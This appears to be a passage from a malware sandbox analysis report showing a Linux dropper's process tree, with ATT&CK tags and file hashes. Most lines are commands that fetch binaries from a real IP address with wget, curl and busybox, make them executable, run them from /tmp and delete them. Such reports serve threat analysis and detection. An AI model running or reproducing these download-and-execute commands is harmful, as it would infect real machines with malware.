/tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q./c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:934
-
-
/bin/chmodchmod 777 xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl./xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:940
-
-
/bin/chmodchmod 777 CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb./CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:946
-
-
/bin/chmodchmod 777 M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH./M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:952
-
-
/bin/chmodchmod 777 JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI./JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:958
-
-
/bin/chmodchmod 777 bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv./bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:964
-
-
/bin/chmodchmod 777 eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K./eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:970
-
-
/bin/chmodchmod 777 VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B./VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:973
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97